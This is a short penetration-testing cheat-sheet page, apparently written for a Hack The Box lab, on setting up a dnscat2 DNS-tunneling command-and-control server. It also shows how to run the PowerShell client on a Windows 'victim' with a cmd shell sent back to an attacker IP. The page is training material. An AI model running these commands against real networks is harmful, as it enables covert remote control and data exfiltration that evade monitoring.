DNScat2

Tunneling tool that send data via an encrypted C2 channel. It send the data inside the TXT records.

Setting up dnscat2

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install

Starting the dnscat2 server

$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

After running, take note the secret key

Importing dnscat2.ps1

$ git clone https://github.com/lukebaggett/dnscat2-powershell.git

transfer the dnscat2.ps1 to the windows victim

PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

dnscat2 commands

dnscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

Interacting with the established sessions

dnscat2> window -i 1

PreviousNetsh NextChisel

Last updated 2 years ago

hashtagSetting up dnscat2

hashtagStarting the dnscat2 server

hashtagImporting dnscat2.ps1

hashtagdnscat2 commands

hashtagInteracting with the established sessions

Setting up dnscat2

Starting the dnscat2 server

Importing dnscat2.ps1

dnscat2 commands

Interacting with the established sessions